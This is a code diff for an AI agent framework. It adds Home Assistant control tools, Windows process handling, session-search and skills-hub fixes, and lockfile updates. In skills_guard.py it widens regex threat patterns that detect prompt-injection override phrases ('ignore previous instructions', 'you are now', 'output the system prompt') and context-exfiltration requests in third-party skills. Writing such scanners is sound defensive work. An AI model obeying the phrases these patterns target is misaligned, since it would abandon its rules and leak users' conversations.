+                    "Entity domain to filter by (e.g. 'light', 'switch', 'climate', "
+                    "'sensor', 'binary_sensor', 'cover', 'fan', 'media_player'). "
+                    "Omit to list all entities."
+                ),
+            },
+            "area": {
+                "type": "string",
+                "description": (
+                    "Area/room name to filter by (e.g. 'living room', 'kitchen'). "
+                    "Matches against entity friendly names. Omit to list all."
+                ),
+            },
+        },
+        "required": [],
+    },
+}
+
+HA_GET_STATE_SCHEMA = {
+    "name": "ha_get_state",
+    "description": (
+        "Get the detailed state of a single Home Assistant entity, including all "
+        "attributes (brightness, color, temperature setpoint, sensor readings, etc.)."
+    ),
+    "parameters": {
+        "type": "object",
+        "properties": {
+            "entity_id": {
+                "type": "string",
+                "description": (
+                    "The entity ID to query (e.g. 'light.living_room', "
+                    "'climate.thermostat', 'sensor.temperature')."
+                ),
+            },
+        },
+        "required": ["entity_id"],
+    },
+}
+
+HA_LIST_SERVICES_SCHEMA = {
+    "name": "ha_list_services",
+    "description": (
+        "List available Home Assistant services (actions) for device control. "
+        "Shows what actions can be performed on each device type and what "
+        "parameters they accept. Use this to discover how to control devices "
+        "found via ha_list_entities."
+    ),
+    "parameters": {
+        "type": "object",
+        "properties": {
+            "domain": {
+                "type": "string",
+                "description": (
+                    "Filter by domain (e.g. 'light', 'climate', 'switch'). "
+                    "Omit to list services for all domains."
+                ),
+            },
+        },
+        "required": [],
+    },
+}
+
+HA_CALL_SERVICE_SCHEMA = {
+    "name": "ha_call_service",
+    "description": (
+        "Call a Home Assistant service to control a device. Use ha_list_services "
+        "to discover available services and their parameters for each domain."
+    ),
+    "parameters": {
+        "type": "object",
+        "properties": {
+            "domain": {
+                "type": "string",
+                "description": (
+                    "Service domain (e.g. 'light', 'switch', 'climate', "
+                    "'cover', 'media_player', 'fan', 'scene', 'script')."
+                ),
+            },
+            "service": {
+                "type": "string",
+                "description": (
+                    "Service name (e.g. 'turn_on', 'turn_off', 'toggle', "
+                    "'set_temperature', 'set_hvac_mode', 'open_cover', "
+                    "'close_cover', 'set_volume_level')."
+                ),
+            },
+            "entity_id": {
+                "type": "string",
+                "description": (
+                    "Target entity ID (e.g. 'light.living_room'). "
+                    "Some services (like scene.turn_on) may not need this."
+                ),
+            },
+            "data": {
+                "type": "object",
+                "description": (
+                    "Additional service data. Examples: "
+                    '{"brightness": 255, "color_name": "blue"} for lights, '
+                    '{"temperature": 22, "hvac_mode": "heat"} for climate, '
+                    '{"volume_level": 0.5} for media players.'
+                ),
+            },
+        },
+        "required": ["domain", "service"],
+    },
+}
+
+
+# ---------------------------------------------------------------------------
+# Registration
+# ---------------------------------------------------------------------------
+
+from tools.registry import registry
+
+registry.register(
+    name="ha_list_entities",
+    toolset="homeassistant",
+    schema=HA_LIST_ENTITIES_SCHEMA,
+    handler=_handle_list_entities,
+    check_fn=_check_ha_available,
+)
+
+registry.register(
+    name="ha_get_state",
+    toolset="homeassistant",
+    schema=HA_GET_STATE_SCHEMA,
+    handler=_handle_get_state,
+    check_fn=_check_ha_available,
+)
+
+registry.register(
+    name="ha_list_services",
+    toolset="homeassistant",
+    schema=HA_LIST_SERVICES_SCHEMA,
+    handler=_handle_list_services,
+    check_fn=_check_ha_available,
+)
+
+registry.register(
+    name="ha_call_service",
+    toolset="homeassistant",
+    schema=HA_CALL_SERVICE_SCHEMA,
+    handler=_handle_call_service,
+    check_fn=_check_ha_available,
+)
--- a/tools/mcp_tool.py
+++ b/tools/mcp_tool.py
--- a/tools/process_registry.py
+++ b/tools/process_registry.py
@@ -32,6 +32,7 @@ Usage:
 import json
 import logging
 import os
+import platform
 import shlex
 import shutil
 import signal
@@ -39,6 +40,9 @@ import subprocess
 import threading
 import time
 import uuid
+
+_IS_WINDOWS = platform.system() == "Windows"
+from tools.environments.local import _find_shell
 from dataclasses import dataclass, field
 from pathlib import Path
 from typing import Any, Dict, List, Optional
@@ -145,7 +149,7 @@ class ProcessRegistry:
            # Try PTY mode for interactive CLI tools
            try:
                import ptyprocess
-                user_shell = os.environ.get("SHELL") or shutil.which("bash") or "/bin/bash"
+                user_shell = _find_shell()
                pty_env = os.environ | (env_vars or {})
                pty_env["PYTHONUNBUFFERED"] = "1"
                pty_proc = ptyprocess.PtyProcess.spawn(
@@ -183,7 +187,7 @@ class ProcessRegistry:
        # Standard Popen path (non-PTY or PTY fallback)
        # Use the user's login shell for consistency with LocalEnvironment --
        # ensures rc files are sourced and user tools are available.
-        user_shell = os.environ.get("SHELL") or shutil.which("bash") or "/bin/bash"
+        user_shell = _find_shell()
        # Force unbuffered output for Python scripts so progress is visible
        # during background execution (libraries like tqdm/datasets buffer when
        # stdout is a pipe, hiding output from process(action="poll")).
@@ -199,7 +203,7 @@ class ProcessRegistry:
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            stdin=subprocess.PIPE,
-            preexec_fn=os.setsid,
+            preexec_fn=None if _IS_WINDOWS else os.setsid,
        )

        session.process = proc
@@ -551,7 +555,10 @@ class ProcessRegistry:
            elif session.process:
                # Local process -- kill the process group
                try:
-                    os.killpg(os.getpgid(session.process.pid), signal.SIGTERM)
+                    if _IS_WINDOWS:
+                        session.process.terminate()
+                    else:
+                        os.killpg(os.getpgid(session.process.pid), signal.SIGTERM)
                except (ProcessLookupError, PermissionError):
                    session.process.kill()
            elif session.env_ref and session.pid:
@@ -816,7 +823,8 @@ def _handle_process(args, **kw):
    import json as _json
    task_id = kw.get("task_id")
    action = args.get("action", "")
-    session_id = args.get("session_id", "")
+    # Coerce to string — some models send session_id as an integer
+    session_id = str(args.get("session_id", "")) if args.get("session_id") is not None else ""

    if action == "list":
        return _json.dumps({"processes": process_registry.list_sessions(task_id=task_id)}, ensure_ascii=False)
@@ -833,9 +841,9 @@ def _handle_process(args, **kw):
        elif action == "kill":
            return _json.dumps(process_registry.kill_process(session_id), ensure_ascii=False)
        elif action == "write":
-            return _json.dumps(process_registry.write_stdin(session_id, args.get("data", "")), ensure_ascii=False)
+            return _json.dumps(process_registry.write_stdin(session_id, str(args.get("data", ""))), ensure_ascii=False)
        elif action == "submit":
-            return _json.dumps(process_registry.submit_stdin(session_id, args.get("data", "")), ensure_ascii=False)
+            return _json.dumps(process_registry.submit_stdin(session_id, str(args.get("data", ""))), ensure_ascii=False)
    return _json.dumps({"error": f"Unknown process action: {action}. Use: list, poll, log, wait, kill, write, submit"}, ensure_ascii=False)


--- a/tools/registry.py
+++ b/tools/registry.py
@@ -146,9 +146,19 @@ class ToolRegistry:
        return {name: e.toolset for name, e in self._tools.items()}

    def is_toolset_available(self, toolset: str) -> bool:
-        """Check if a toolset's requirements are met."""
+        """Check if a toolset's requirements are met.
+
+        Returns False (rather than crashing) when the check function raises
+        an unexpected exception (e.g. network error, missing import, bad config).
+        """
        check = self._toolset_checks.get(toolset)
-        return check() if check else True
+        if not check:
+            return True
+        try:
+            return bool(check())
+        except Exception:
+            logger.debug("Toolset %s check raised; marking unavailable", toolset)
+            return False

    def check_toolset_requirements(self) -> Dict[str, bool]:
        """Return ``{toolset: available_bool}`` for every toolset."""
--- a/tools/session_search_tool.py
+++ b/tools/session_search_tool.py
@@ -183,11 +183,13 @@ def session_search(
    role_filter: str = None,
    limit: int = 3,
    db=None,
+    current_session_id: str = None,
 ) -> str:
    """
    Search past sessions and return focused summaries of matching conversations.

    Uses FTS5 to find matches, then summarizes the top sessions with Gemini Flash.
+    The current session is excluded from results since the agent already has that context.
    """
    if db is None:
        return json.dumps({"success": False, "error": "Session database not available."}, ensure_ascii=False)
@@ -238,11 +240,16 @@ def session_search(
                    break
            return sid

-        # Group by resolved (parent) session_id, dedup
+        # Group by resolved (parent) session_id, dedup, skip current session
        seen_sessions = {}
        for result in raw_results:
            raw_sid = result["session_id"]
            resolved_sid = _resolve_to_parent(raw_sid)
+            # Skip the current session — the agent already has that context
+            if current_session_id and resolved_sid == current_session_id:
+                continue
+            if current_session_id and raw_sid == current_session_id:
+                continue
            if resolved_sid not in seen_sessions:
                result = dict(result)
                result["session_id"] = resolved_sid
@@ -368,6 +375,7 @@ registry.register(
        query=args.get("query", ""),
        role_filter=args.get("role_filter"),
        limit=args.get("limit", 3),
-        db=kw.get("db")),
+        db=kw.get("db"),
+        current_session_id=kw.get("current_session_id")),
    check_fn=check_session_search_requirements,
 )
--- a/tools/skills_guard.py
+++ b/tools/skills_guard.py
@@ -157,31 +157,31 @@ THREAT_PATTERNS = [
     "markdown link with variable interpolation"),

    # ── Prompt injection ──
-    (r'ignore\s+(previous|all|above|prior)\s+instructions',
+    (r'ignore\s+(?:\w+\s+)*(previous|all|above|prior)\s+instructions',
     "prompt_injection_ignore", "critical", "injection",
     "prompt injection: ignore previous instructions"),
-    (r'you\s+are\s+now\s+',
+    (r'you\s+are\s+(?:\w+\s+)*now\s+',
     "role_hijack", "high", "injection",
     "attempts to override the agent's role"),
-    (r'do\s+not\s+tell\s+the\s+user',
+    (r'do\s+not\s+(?:\w+\s+)*tell\s+(?:\w+\s+)*the\s+user',
     "deception_hide", "critical", "injection",
     "instructs agent to hide information from user"),
    (r'system\s+prompt\s+override',
     "sys_prompt_override", "critical", "injection",
     "attempts to override the system prompt"),
-    (r'pretend\s+(you\s+are|to\s+be)\s+',
+    (r'pretend\s+(?:\w+\s+)*(you\s+are|to\s+be)\s+',
     "role_pretend", "high", "injection",
     "attempts to make the agent assume a different identity"),
-    (r'disregard\s+(your|all|any)\s+(instructions|rules|guidelines)',
+    (r'disregard\s+(?:\w+\s+)*(your|all|any)\s+(?:\w+\s+)*(instructions|rules|guidelines)',
     "disregard_rules", "critical", "injection",
     "instructs agent to disregard its rules"),
-    (r'output\s+the\s+(system|initial)\s+prompt',
+    (r'output\s+(?:\w+\s+)*(system|initial)\s+prompt',
     "leak_system_prompt", "high", "injection",
     "attempts to extract the system prompt"),
    (r'(when|if)\s+no\s*one\s+is\s+(watching|looking)',
     "conditional_deception", "high", "injection",
     "conditional instruction to behave differently when unobserved"),
-    (r'act\s+as\s+(if|though)\s+you\s+(have\s+no|don\'t\s+have)\s+(restrictions|limits|rules)',
+    (r'act\s+as\s+(if|though)\s+(?:\w+\s+)*you\s+(?:\w+\s+)*(have\s+no|don\'t\s+have)\s+(?:\w+\s+)*(restrictions|limits|rules)',
     "bypass_restrictions", "critical", "injection",
     "instructs agent to act without restrictions"),
    (r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)',
@@ -464,10 +464,10 @@ THREAT_PATTERNS = [
    (r'for\s+educational\s+purposes?\s+only',
     "educational_pretext", "medium", "injection",
     "educational pretext often used to justify harmful content"),
-    (r'(respond|answer|reply)\s+without\s+(any\s+)?(restrictions|limitations|filters|safety)',
+    (r'(respond|answer|reply)\s+without\s+(?:\w+\s+)*(restrictions|limitations|filters|safety)',
     "remove_filters", "critical", "injection",
     "instructs agent to respond without safety filters"),
-    (r'you\s+have\s+been\s+(updated|upgraded|patched)\s+to',
+    (r'you\s+have\s+been\s+(?:\w+\s+)*(updated|upgraded|patched)\s+to',
     "fake_update", "high", "injection",
     "fake update/patch announcement (social engineering)"),
    (r'new\s+policy|updated\s+guidelines|revised\s+instructions',
@@ -475,7 +475,7 @@ THREAT_PATTERNS = [
     "claims new policy/guidelines (may be social engineering)"),

    # ── Context window exfiltration ──
-    (r'(include|output|print|send|share)\s+(the\s+)?(entire\s+)?(conversation|chat\s+history|previous\s+messages|context)',
+    (r'(include|output|print|send|share)\s+(?:\w+\s+)*(conversation|chat\s+history|previous\s+messages|context)',
     "context_exfil", "high", "exfiltration",
     "instructs agent to output/share conversation history"),
    (r'(send|post|upload|transmit)\s+.*\s+(to|at)\s+https?://',
--- a/tools/skills_hub.py
+++ b/tools/skills_hub.py
@@ -520,8 +520,8 @@ class ClawHubSource(SkillSource):

        try:
            resp = httpx.get(
-                f"{self.BASE_URL}/skills/search",
-                params={"q": query, "limit": limit},
+                f"{self.BASE_URL}/skills",
+                params={"search": query, "limit": limit},
                timeout=15,
            )
            if resp.status_code != 200:
@@ -530,82 +530,154 @@ class ClawHubSource(SkillSource):
        except (httpx.HTTPError, json.JSONDecodeError):
            return []

-        skills_data = data.get("skills", data) if isinstance(data, dict) else data
+        skills_data = data.get("items", data) if isinstance(data, dict) else data
        if not isinstance(skills_data, list):
            return []

        results = []
        for item in skills_data[:limit]:
-            name = item.get("name", item.get("slug", ""))
-            if not name:
+            slug = item.get("slug")
+            if not slug:
                continue
-            meta = SkillMeta(
-                name=name,
-                description=item.get("description", ""),
+            display_name = item.get("displayName") or item.get("name") or slug
+            summary = item.get("summary") or item.get("description") or ""
+            tags = item.get("tags", [])
+            if not isinstance(tags, list):
+                tags = []
+            results.append(SkillMeta(
+                name=display_name,
+                description=summary,
                source="clawhub",
-                identifier=item.get("slug", name),
+                identifier=slug,
                trust_level="community",
-                tags=item.get("tags", []),
-            )
-            results.append(meta)
+                tags=[str(t) for t in tags],
+            ))

        _write_index_cache(cache_key, [_skill_meta_to_dict(s) for s in results])
        return results

    def fetch(self, identifier: str) -> Optional[SkillBundle]:
-        try:
-            resp = httpx.get(
-                f"{self.BASE_URL}/skills/{identifier}/versions/latest/files",
-                timeout=30,
-            )
-            if resp.status_code != 200:
-                return None
-            data = resp.json()
-        except (httpx.HTTPError, json.JSONDecodeError):
+        slug = identifier.split("/")[-1]
+
+        skill_data = self._get_json(f"{self.BASE_URL}/skills/{slug}")
+        if not isinstance(skill_data, dict):
            return None

-        files: Dict[str, str] = {}
-        file_list = data.get("files", data) if isinstance(data, dict) else data
-        if isinstance(file_list, list):
-            for f in file_list:
-                fname = f.get("name", f.get("path", ""))
-                content = f.get("content", "")
-                if fname and content:
-                    files[fname] = content
-        elif isinstance(file_list, dict):
-            files = {k: v for k, v in file_list.items() if isinstance(v, str)}
+        latest_version = self._resolve_latest_version(slug, skill_data)
+        if not latest_version:
+            logger.warning("ClawHub fetch failed for %s: could not resolve latest version", slug)
+            return None

+        version_data = self._get_json(f"{self.BASE_URL}/skills/{slug}/versions/{latest_version}")
+        if not isinstance(version_data, dict):
+            return None
+
+        files = self._extract_files(version_data)
        if "SKILL.md" not in files:
+            logger.warning(
+                "ClawHub fetch for %s resolved version %s but no inline/raw file content was available",
+                slug,
+                latest_version,
+            )
            return None

        return SkillBundle(
-            name=identifier.split("/")[-1] if "/" in identifier else identifier,
+            name=slug,
            files=files,
            source="clawhub",
-            identifier=identifier,
+            identifier=slug,
            trust_level="community",
        )

    def inspect(self, identifier: str) -> Optional[SkillMeta]:
+        slug = identifier.split("/")[-1]
+        data = self._get_json(f"{self.BASE_URL}/skills/{slug}")
+        if not isinstance(data, dict):
+            return None
+
+        tags = data.get("tags", [])
+        if not isinstance(tags, list):
+            tags = []
+
+        return SkillMeta(
+            name=data.get("displayName") or data.get("name") or data.get("slug") or slug,
+            description=data.get("summary") or data.get("description") or "",
+            source="clawhub",
+            identifier=data.get("slug") or slug,
+            trust_level="community",
+            tags=[str(t) for t in tags],
+        )
+
+    def _get_json(self, url: str, timeout: int = 20) -> Optional[Any]:
        try:
-            resp = httpx.get(
-                f"{self.BASE_URL}/skills/{identifier}",
-                timeout=15,
-            )
+            resp = httpx.get(url, timeout=timeout)
            if resp.status_code != 200:
                return None
-            data = resp.json()
+            return resp.json()
        except (httpx.HTTPError, json.JSONDecodeError):
            return None

-        return SkillMeta(
-            name=data.get("name", identifier),
-            description=data.get("description", ""),
-            source="clawhub",
-            identifier=identifier,
-            trust_level="community",
-            tags=data.get("tags", []),
-        )
+    def _resolve_latest_version(self, slug: str, skill_data: Dict[str, Any]) -> Optional[str]:
+        latest = skill_data.get("latestVersion")
+        if isinstance(latest, dict):
+            version = latest.get("version")
+            if isinstance(version, str) and version:
+                return version
+
+        tags = skill_data.get("tags")
+        if isinstance(tags, dict):
+            latest_tag = tags.get("latest")
+            if isinstance(latest_tag, str) and latest_tag:
+                return latest_tag
+
+        versions_data = self._get_json(f"{self.BASE_URL}/skills/{slug}/versions")
+        if isinstance(versions_data, list) and versions_data:
+            first = versions_data[0]
+            if isinstance(first, dict):
+                version = first.get("version")
+                if isinstance(version, str) and version:
+                    return version
+        return None
+
+    def _extract_files(self, version_data: Dict[str, Any]) -> Dict[str, str]:
+        files: Dict[str, str] = {}
+        file_list = version_data.get("files")
+
+        if isinstance(file_list, dict):
+            return {k: v for k, v in file_list.items() if isinstance(v, str)}
+
+        if not isinstance(file_list, list):
+            return files
+
+        for file_meta in file_list:
+            if not isinstance(file_meta, dict):
+                continue
+
+            fname = file_meta.get("path") or file_meta.get("name")
+            if not fname or not isinstance(fname, str):
+                continue
+
+            inline_content = file_meta.get("content")
+            if isinstance(inline_content, str):
+                files[fname] = inline_content
+                continue
+
+            raw_url = file_meta.get("rawUrl") or file_meta.get("downloadUrl") or file_meta.get("url")
+            if isinstance(raw_url, str) and raw_url.startswith("http"):
+                content = self._fetch_text(raw_url)
+                if content is not None:
+                    files[fname] = content
+
+        return files
+
+    def _fetch_text(self, url: str) -> Optional[str]:
+        try:
+            resp = httpx.get(url, timeout=20)
+            if resp.status_code == 200:
+                return resp.text
+        except httpx.HTTPError:
+            return None
+        return None


 # ---------------------------------------------------------------------------
--- a/tools/skills_tool.py
+++ b/tools/skills_tool.py
@@ -458,7 +458,7 @@ def skill_view(name: str, file_path: str = None, task_id: str = None) -> str:
            try:
                resolved = target_file.resolve()
                skill_dir_resolved = skill_dir.resolve()
-                if not str(resolved).startswith(str(skill_dir_resolved) + "/") and resolved != skill_dir_resolved:
+                if not resolved.is_relative_to(skill_dir_resolved):
                    return json.dumps({
                        "success": False,
                        "error": "Path escapes skill directory boundary.",
--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -638,19 +638,18 @@ def get_active_environments_info() -> Dict[str, Any]:
        "workdirs": {},
    }
    
-    # Calculate total disk usage
+    # Calculate total disk usage (per-task to avoid double-counting)
    total_size = 0
    for task_id in _active_environments.keys():
-        # Check sandbox and workdir sizes
        scratch_dir = _get_scratch_dir()
-        for pattern in [f"hermes-*{task_id[:8]}*"]:
-            import glob
-            for path in glob.glob(str(scratch_dir / "hermes-*")):
-                try:
-                    size = sum(f.stat().st_size for f in Path(path).rglob('*') if f.is_file())
-                    total_size += size
-                except OSError:
-                    pass
+        pattern = f"hermes-*{task_id[:8]}*"
+        import glob
+        for path in glob.glob(str(scratch_dir / pattern)):
+            try:
+                size = sum(f.stat().st_size for f in Path(path).rglob('*') if f.is_file())
+                total_size += size
+            except OSError:
+                pass
    
    info["total_disk_usage_mb"] = round(total_size / (1024 * 1024), 2)
    return info
--- a/toolsets.py
+++ b/toolsets.py
@@ -62,6 +62,8 @@ _HERMES_CORE_TOOLS = [
    "send_message",
    # Honcho user context (gated on honcho being active via check_fn)
    "query_user_context",
+    # Home Assistant smart home control (gated on HASS_TOKEN via check_fn)
+    "ha_list_entities", "ha_get_state", "ha_list_services", "ha_call_service",
 ]


@@ -193,8 +195,14 @@ TOOLSETS = {
        "tools": ["query_user_context"],
        "includes": []
    },
-    
-    
+
+    "homeassistant": {
+        "description": "Home Assistant smart home control and monitoring",
+        "tools": ["ha_list_entities", "ha_get_state", "ha_list_services", "ha_call_service"],
+        "includes": []
+    },
+
+
    # Scenario-specific toolsets
    
    "debugging": {
@@ -247,10 +255,16 @@ TOOLSETS = {
        "includes": []
    },
    
+    "hermes-homeassistant": {
+        "description": "Home Assistant bot toolset - smart home event monitoring and control",
+        "tools": _HERMES_CORE_TOOLS,
+        "includes": []
+    },
+
    "hermes-gateway": {
        "description": "Gateway toolset - union of all messaging platform tools",
        "tools": [],
-        "includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack"]
+        "includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack", "hermes-homeassistant"]
    }
 }

--- a/uv.lock
+++ b/uv.lock
@@ -1015,6 +1015,7 @@ all = [
    { name = "discord-py" },
    { name = "elevenlabs" },
    { name = "honcho-ai" },
+    { name = "mcp" },
    { name = "ptyprocess" },
    { name = "pytest" },
    { name = "pytest-asyncio" },
@@ -1034,9 +1035,15 @@ dev = [
    { name = "pytest" },
    { name = "pytest-asyncio" },
 ]
+homeassistant = [
+    { name = "aiohttp" },
+]
 honcho = [
    { name = "honcho-ai" },
 ]
+mcp = [
+    { name = "mcp" },
+]
 messaging = [
    { name = "aiohttp" },
    { name = "discord-py" },
@@ -1060,6 +1067,7 @@ tts-premium = [

 [package.metadata]
 requires-dist = [
+    { name = "aiohttp", marker = "extra == 'homeassistant'", specifier = ">=3.9.0" },
    { name = "aiohttp", marker = "extra == 'messaging'", specifier = ">=3.9.0" },
    { name = "croniter", marker = "extra == 'cron'" },
    { name = "discord-py", marker = "extra == 'messaging'", specifier = ">=2.0" },
@@ -1071,7 +1079,9 @@ requires-dist = [
    { name = "hermes-agent", extras = ["cli"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["cron"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["dev"], marker = "extra == 'all'" },
+    { name = "hermes-agent", extras = ["homeassistant"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["honcho"], marker = "extra == 'all'" },
+    { name = "hermes-agent", extras = ["mcp"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["messaging"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["modal"], marker = "extra == 'all'" },
    { name = "hermes-agent", extras = ["pty"], marker = "extra == 'all'" },
@@ -1081,6 +1091,7 @@ requires-dist = [
    { name = "httpx" },
    { name = "jinja2" },
    { name = "litellm", specifier = ">=1.75.5" },
+    { name = "mcp", marker = "extra == 'mcp'", specifier = ">=1.2.0" },
    { name = "openai" },
    { name = "platformdirs" },
    { name = "prompt-toolkit" },
@@ -1103,7 +1114,7 @@ requires-dist = [
    { name = "tenacity" },
    { name = "typer" },
 ]
-provides-extras = ["modal", "dev", "messaging", "cron", "slack", "cli", "tts-premium", "pty", "honcho", "all"]
+provides-extras = ["modal", "dev", "messaging", "cron", "slack", "cli", "tts-premium", "pty", "honcho", "mcp", "homeassistant", "all"]

 [[package]]
 name = "hf-xet"
@@ -1522,6 +1533,31 @@ wheels = [
    { url = "https://files.pythonhosted.org/packages/70/bc/6f1c2f612465f5fa89b95bead1f44dcb607670fd42891d8fdcd5d039f4f4/markupsafe-3.0.3-cp314-cp314t-win_arm64.whl", hash = "sha256:32001d6a8fc98c8cb5c947787c5d08b0a50663d139f1305bac5885d98d9b40fa", size = 14146, upload-time = "2025-09-27T18:37:28.327Z" },
 ]

+[[package]]
+name = "mcp"
+version = "1.26.0"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "anyio" },
+    { name = "httpx" },
+    { name = "httpx-sse" },
+    { name = "jsonschema" },
+    { name = "pydantic" },
+    { name = "pydantic-settings" },
+    { name = "pyjwt", extra = ["crypto"] },
+    { name = "python-multipart" },
+    { name = "pywin32", marker = "sys_platform == 'win32'" },
+    { name = "sse-starlette" },
+    { name = "starlette" },
+    { name = "typing-extensions" },
+    { name = "typing-inspection" },
+    { name = "uvicorn", marker = "sys_platform != 'emscripten'" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/fc/6d/62e76bbb8144d6ed86e202b5edd8a4cb631e7c8130f3f4893c3f90262b10/mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66", size = 608005, upload-time = "2026-01-24T19:40:32.468Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/fd/d9/eaa1f80170d2b7c5ba23f3b59f766f3a0bb41155fbc32a69adfa1adaaef9/mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca", size = 233615, upload-time = "2026-01-24T19:40:30.652Z" },
+]
+
 [[package]]
 name = "mdurl"
 version = "0.1.2"
@@ -2114,6 +2150,20 @@ wheels = [
    { url = "https://files.pythonhosted.org/packages/36/c7/cfc8e811f061c841d7990b0201912c3556bfeb99cdcb7ed24adc8d6f8704/pydantic_core-2.41.5-pp311-pypy311_pp73-win_amd64.whl", hash = "sha256:56121965f7a4dc965bff783d70b907ddf3d57f6eba29b6d2e5dabfaf07799c51", size = 2145302, upload-time = "2025-11-04T13:43:46.64Z" },
 ]

+[[package]]
+name = "pydantic-settings"
+version = "2.13.1"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "pydantic" },
+    { name = "python-dotenv" },
+    { name = "typing-inspection" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/52/6d/fffca34caecc4a3f97bda81b2098da5e8ab7efc9a66e819074a11955d87e/pydantic_settings-2.13.1.tar.gz", hash = "sha256:b4c11847b15237fb0171e1462bf540e294affb9b86db4d9aa5c01730bdbe4025", size = 223826, upload-time = "2026-02-19T13:45:08.055Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/00/4b/ccc026168948fec4f7555b9164c724cf4125eac006e176541483d2c959be/pydantic_settings-2.13.1-py3-none-any.whl", hash = "sha256:d56fd801823dbeae7f0975e1f8c8e25c258eb75d278ea7abb5d9cebb01b56237", size = 58929, upload-time = "2026-02-19T13:45:06.034Z" },
+]
+
 [[package]]
 name = "pygments"
 version = "2.19.2"
@@ -2221,6 +2271,28 @@ wheels = [
    { url = "https://files.pythonhosted.org/packages/81/c4/34e93fe5f5429d7570ec1fa436f1986fb1f00c3e0f43a589fe2bbcd22c3f/pytz-2025.2-py2.py3-none-any.whl", hash = "sha256:5ddf76296dd8c44c26eb8f4b6f35488f3ccbf6fbbd7adee0b7262d43f0ec2f00", size = 509225, upload-time = "2025-03-25T02:24:58.468Z" },
 ]

+[[package]]
+name = "pywin32"
+version = "311"
+source = { registry = "https://pypi.org/simple" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/7b/40/44efbb0dfbd33aca6a6483191dae0716070ed99e2ecb0c53683f400a0b4f/pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3", size = 8760432, upload-time = "2025-07-14T20:13:05.9Z" },
+    { url = "https://files.pythonhosted.org/packages/5e/bf/360243b1e953bd254a82f12653974be395ba880e7ec23e3731d9f73921cc/pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b", size = 9590103, upload-time = "2025-07-14T20:13:07.698Z" },
+    { url = "https://files.pythonhosted.org/packages/57/38/d290720e6f138086fb3d5ffe0b6caa019a791dd57866940c82e4eeaf2012/pywin32-311-cp310-cp310-win_arm64.whl", hash = "sha256:0502d1facf1fed4839a9a51ccbcc63d952cf318f78ffc00a7e78528ac27d7a2b", size = 8778557, upload-time = "2025-07-14T20:13:11.11Z" },
+    { url = "https://files.pythonhosted.org/packages/7c/af/449a6a91e5d6db51420875c54f6aff7c97a86a3b13a0b4f1a5c13b988de3/pywin32-311-cp311-cp311-win32.whl", hash = "sha256:184eb5e436dea364dcd3d2316d577d625c0351bf237c4e9a5fabbcfa5a58b151", size = 8697031, upload-time = "2025-07-14T20:13:13.266Z" },
+    { url = "https://files.pythonhosted.org/packages/51/8f/9bb81dd5bb77d22243d33c8397f09377056d5c687aa6d4042bea7fbf8364/pywin32-311-cp311-cp311-win_amd64.whl", hash = "sha256:3ce80b34b22b17ccbd937a6e78e7225d80c52f5ab9940fe0506a1a16f3dab503", size = 9508308, upload-time = "2025-07-14T20:13:15.147Z" },
+    { url = "https://files.pythonhosted.org/packages/44/7b/9c2ab54f74a138c491aba1b1cd0795ba61f144c711daea84a88b63dc0f6c/pywin32-311-cp311-cp311-win_arm64.whl", hash = "sha256:a733f1388e1a842abb67ffa8e7aad0e70ac519e09b0f6a784e65a136ec7cefd2", size = 8703930, upload-time = "2025-07-14T20:13:16.945Z" },
+    { url = "https://files.pythonhosted.org/packages/e7/ab/01ea1943d4eba0f850c3c61e78e8dd59757ff815ff3ccd0a84de5f541f42/pywin32-311-cp312-cp312-win32.whl", hash = "sha256:750ec6e621af2b948540032557b10a2d43b0cee2ae9758c54154d711cc852d31", size = 8706543, upload-time = "2025-07-14T20:13:20.765Z" },
+    { url = "https://files.pythonhosted.org/packages/d1/a8/a0e8d07d4d051ec7502cd58b291ec98dcc0c3fff027caad0470b72cfcc2f/pywin32-311-cp312-cp312-win_amd64.whl", hash = "sha256:b8c095edad5c211ff31c05223658e71bf7116daa0ecf3ad85f3201ea3190d067", size = 9495040, upload-time = "2025-07-14T20:13:22.543Z" },
+    { url = "https://files.pythonhosted.org/packages/ba/3a/2ae996277b4b50f17d61f0603efd8253cb2d79cc7ae159468007b586396d/pywin32-311-cp312-cp312-win_arm64.whl", hash = "sha256:e286f46a9a39c4a18b319c28f59b61de793654af2f395c102b4f819e584b5852", size = 8710102, upload-time = "2025-07-14T20:13:24.682Z" },
+    { url = "https://files.pythonhosted.org/packages/a5/be/3fd5de0979fcb3994bfee0d65ed8ca9506a8a1260651b86174f6a86f52b3/pywin32-311-cp313-cp313-win32.whl", hash = "sha256:f95ba5a847cba10dd8c4d8fefa9f2a6cf283b8b88ed6178fa8a6c1ab16054d0d", size = 8705700, upload-time = "2025-07-14T20:13:26.471Z" },
+    { url = "https://files.pythonhosted.org/packages/e3/28/e0a1909523c6890208295a29e05c2adb2126364e289826c0a8bc7297bd5c/pywin32-311-cp313-cp313-win_amd64.whl", hash = "sha256:718a38f7e5b058e76aee1c56ddd06908116d35147e133427e59a3983f703a20d", size = 9494700, upload-time = "2025-07-14T20:13:28.243Z" },
